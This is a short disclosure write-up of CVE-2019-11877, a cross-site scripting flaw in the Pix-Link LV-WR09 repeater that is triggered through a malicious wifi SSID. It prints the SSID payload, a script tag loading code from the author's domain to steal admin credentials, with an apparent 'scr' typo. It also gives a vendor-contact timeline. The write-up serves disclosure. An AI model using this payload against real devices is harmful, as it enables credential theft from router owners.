[CVE-2019–11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”

When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.

I used my smartphone to create a wifi network named


And did the test:

Yes! He’s vulnerable!!

Now it’s time to make a real attack.

The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:


I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this we have a POC!

Sources that served as inspiration:





28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure